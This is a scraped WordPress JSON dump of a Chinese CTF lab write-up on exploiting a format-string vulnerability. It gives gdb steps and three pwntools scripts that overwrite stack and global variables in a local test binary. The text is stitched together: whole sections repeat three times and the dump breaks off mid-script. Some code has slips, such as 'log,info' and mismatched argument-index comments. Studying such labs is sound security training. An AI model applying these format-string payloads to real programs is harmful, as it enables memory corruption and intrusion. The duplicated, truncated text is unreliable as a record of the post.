\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
b vulnfunc<\/p>\n\n\n\n
r<\/p>\n\n\n\n
disassemble<\/p>\n\n\n\n
\u53ef\u4ee5\u770b\u5230a\u53d8\u91cf\u58f0\u660e\u7684\u4ee3\u7801<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u5728\u58f0\u660ea\u53d8\u91cf\u540e\u8bbe\u7f6e\u65ad\u70b9 b *0x08049219<\/p>\n\n\n\nc<\/p>\n\n\n\nx\/wx $ebp-0x110<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u5728\u58f0\u660ea\u53d8\u91cf\u540e\u8bbe\u7f6e\u65ad\u70b9 b *0x08049219<\/p>\n\n\n\n
c<\/p>\n\n\n\n
x\/wx $ebp-0x110<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n
\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n
\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n
\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n
\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n p = process('.\/test2')\n\n # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n a_addr = 0xffffd078 # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n payload = p32(a_addr) + b\"%12c%7$n\" # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\n print(p.clean())\n p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n\u8fdb\u5165b == 2<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\nb\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = ['tmux','splitw','-h']\n\np = process(\".\/test2\")\n\ndef exploit_c():\n b_address = 0x804c02c\n #\u6784\u9020Payload\n padding = b'11'\n padding_address = b'\\x00\\x00'\n\n Payload = padding + b'%9$n' + padding_address + p32(b_address)\n log,info(\"Payload: %s\" % Payload)\n #\u53d1\u9001Payload\n p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\nb\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\nobjdump -t .\/test2 | grep bobjdump -t .\/test2 | grep c<\/pre>\n\n\n\n\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\nfrom pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # 